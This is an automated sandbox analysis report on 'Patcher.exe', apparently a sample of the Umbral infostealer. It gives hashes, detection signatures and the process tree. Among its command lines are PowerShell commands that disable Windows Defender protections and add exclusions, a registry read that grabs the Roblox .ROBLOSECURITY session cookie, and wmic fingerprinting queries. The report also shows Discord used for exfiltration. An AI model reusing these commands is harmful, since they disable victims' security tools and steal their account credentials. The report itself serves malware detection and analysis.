Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
09-09-2024 08:11
Behavioral task
behavioral1
Sample
Patcher.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
Patcher.exe
Resource
win10v2004-20240802-en
General
-
Target
Patcher.exe
-
Size
292KB
-
MD5
40e407453b653751e0f3b6237500c362
-
SHA1
70c4819f3df236d816f01e884b88c683c87de8a7
-
SHA256
42441a6e6eefa60a69c49cc280d1faafa48e0a3bc8e6787c3248a0c610c48c64
-
SHA512
8298c7ef17583af41230b9a8a2d8cb69033f97a6a5ea19804f40e7d95c22af12feaef3b3a8f609320f72a85d323127aea6bdb8d493303ffd9c31bf14998737bb
-
SSDEEP
6144:zloZMArIkd8g+EtXHkv/iD4Na1Q2AmB5K7/Cwhl0fjb8e1moirBcG95S:xoZHL+EP8Na1Q2AmB5K7/Cwhl0/arxK
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2756-1-0x0000000000140000-0x0000000000190000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2772 powershell.exe 2180 powershell.exe 1388 powershell.exe 2864 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Patcher.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2016 wmic.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2772 powershell.exe 2864 powershell.exe 2180 powershell.exe 2984 powershell.exe 1388 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2756 Patcher.exe Token: SeDebugPrivilege 2772 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeDebugPrivilege 2180 powershell.exe Token: SeDebugPrivilege 2984 powershell.exe Token: SeIncreaseQuotaPrivilege 2632 wmic.exe Token: SeSecurityPrivilege 2632 wmic.exe Token: SeTakeOwnershipPrivilege 2632 wmic.exe Token: SeLoadDriverPrivilege 2632 wmic.exe Token: SeSystemProfilePrivilege 2632 wmic.exe Token: SeSystemtimePrivilege 2632 wmic.exe Token: SeProfSingleProcessPrivilege 2632 wmic.exe Token: SeIncBasePriorityPrivilege 2632 wmic.exe Token: SeCreatePagefilePrivilege 2632 wmic.exe Token: SeBackupPrivilege 2632 wmic.exe Token: SeRestorePrivilege 2632 wmic.exe Token: SeShutdownPrivilege 2632 wmic.exe Token: SeDebugPrivilege 2632 wmic.exe Token: SeSystemEnvironmentPrivilege 2632 wmic.exe Token: SeRemoteShutdownPrivilege 2632 wmic.exe Token: SeUndockPrivilege 2632 wmic.exe Token: SeManageVolumePrivilege 2632 wmic.exe Token: 33 2632 wmic.exe Token: 34 2632 wmic.exe Token: 35 2632 wmic.exe Token: SeIncreaseQuotaPrivilege 2632 wmic.exe Token: SeSecurityPrivilege 2632 wmic.exe Token: SeTakeOwnershipPrivilege 2632 wmic.exe Token: SeLoadDriverPrivilege 2632 wmic.exe Token: SeSystemProfilePrivilege 2632 wmic.exe Token: SeSystemtimePrivilege 2632 wmic.exe Token: SeProfSingleProcessPrivilege 2632 wmic.exe Token: SeIncBasePriorityPrivilege 2632 wmic.exe Token: SeCreatePagefilePrivilege 2632 wmic.exe Token: SeBackupPrivilege 2632 wmic.exe Token: SeRestorePrivilege 2632 wmic.exe Token: SeShutdownPrivilege 2632 wmic.exe Token: SeDebugPrivilege 2632 wmic.exe Token: SeSystemEnvironmentPrivilege 2632 wmic.exe Token: SeRemoteShutdownPrivilege 2632 wmic.exe Token: SeUndockPrivilege 2632 wmic.exe Token: SeManageVolumePrivilege 2632 wmic.exe Token: 33 2632 wmic.exe Token: 34 2632 wmic.exe Token: 35 2632 wmic.exe Token: SeIncreaseQuotaPrivilege 348 wmic.exe Token: SeSecurityPrivilege 348 wmic.exe Token: SeTakeOwnershipPrivilege 348 wmic.exe Token: SeLoadDriverPrivilege 348 wmic.exe Token: SeSystemProfilePrivilege 348 wmic.exe Token: SeSystemtimePrivilege 348 wmic.exe Token: SeProfSingleProcessPrivilege 348 wmic.exe Token: SeIncBasePriorityPrivilege 348 wmic.exe Token: SeCreatePagefilePrivilege 348 wmic.exe Token: SeBackupPrivilege 348 wmic.exe Token: SeRestorePrivilege 348 wmic.exe Token: SeShutdownPrivilege 348 wmic.exe Token: SeDebugPrivilege 348 wmic.exe Token: SeSystemEnvironmentPrivilege 348 wmic.exe Token: SeRemoteShutdownPrivilege 348 wmic.exe Token: SeUndockPrivilege 348 wmic.exe Token: SeManageVolumePrivilege 348 wmic.exe Token: 33 348 wmic.exe Token: 34 348 wmic.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2756 wrote to memory of 2772 2756 Patcher.exe 31 PID 2756 wrote to memory of 2772 2756 Patcher.exe 31 PID 2756 wrote to memory of 2772 2756 Patcher.exe 31 PID 2756 wrote to memory of 2864 2756 Patcher.exe 33 PID 2756 wrote to memory of 2864 2756 Patcher.exe 33 PID 2756 wrote to memory of 2864 2756 Patcher.exe 33 PID 2756 wrote to memory of 2180 2756 Patcher.exe 35 PID 2756 wrote to memory of 2180 2756 Patcher.exe 35 PID 2756 wrote to memory of 2180 2756 Patcher.exe 35 PID 2756 wrote to memory of 2984 2756 Patcher.exe 37 PID 2756 wrote to memory of 2984 2756 Patcher.exe 37 PID 2756 wrote to memory of 2984 2756 Patcher.exe 37 PID 2756 wrote to memory of 2632 2756 Patcher.exe 39 PID 2756 wrote to memory of 2632 2756 Patcher.exe 39 PID 2756 wrote to memory of 2632 2756 Patcher.exe 39 PID 2756 wrote to memory of 348 2756 Patcher.exe 42 PID 2756 wrote to memory of 348 2756 Patcher.exe 42 PID 2756 wrote to memory of 348 2756 Patcher.exe 42 PID 2756 wrote to memory of 2900 2756 Patcher.exe 44 PID 2756 wrote to memory of 2900 2756 Patcher.exe 44 PID 2756 wrote to memory of 2900 2756 Patcher.exe 44 PID 2756 wrote to memory of 1388 2756 Patcher.exe 46 PID 2756 wrote to memory of 1388 2756 Patcher.exe 46 PID 2756 wrote to memory of 1388 2756 Patcher.exe 46 PID 2756 wrote to memory of 2016 2756 Patcher.exe 48 PID 2756 wrote to memory of 2016 2756 Patcher.exe 48 PID 2756 wrote to memory of 2016 2756 Patcher.exe 48
Processes
-
C:\Users\Admin\AppData\Local\Temp\Patcher.exe"C:\Users\Admin\AppData\Local\Temp\Patcher.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Patcher.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:348
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:2900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1388
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2016
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58dcb8ea77cc26501b7041bbc955d1651
SHA1bb44e25707613fb632f722a2243ea91a0eab059b
SHA25618725fc4fe4bf8cbca409baf441d8a1d54d4c6d817081472e492ef10643bb5b6
SHA5127f25c5233df08335a6704b0e4f38884b2151ebf2e7f9bde1a7fb10284de4f30d3dd39ce50675b5bace8547804594a18e70fc9365e32aae085131342e99fbd8af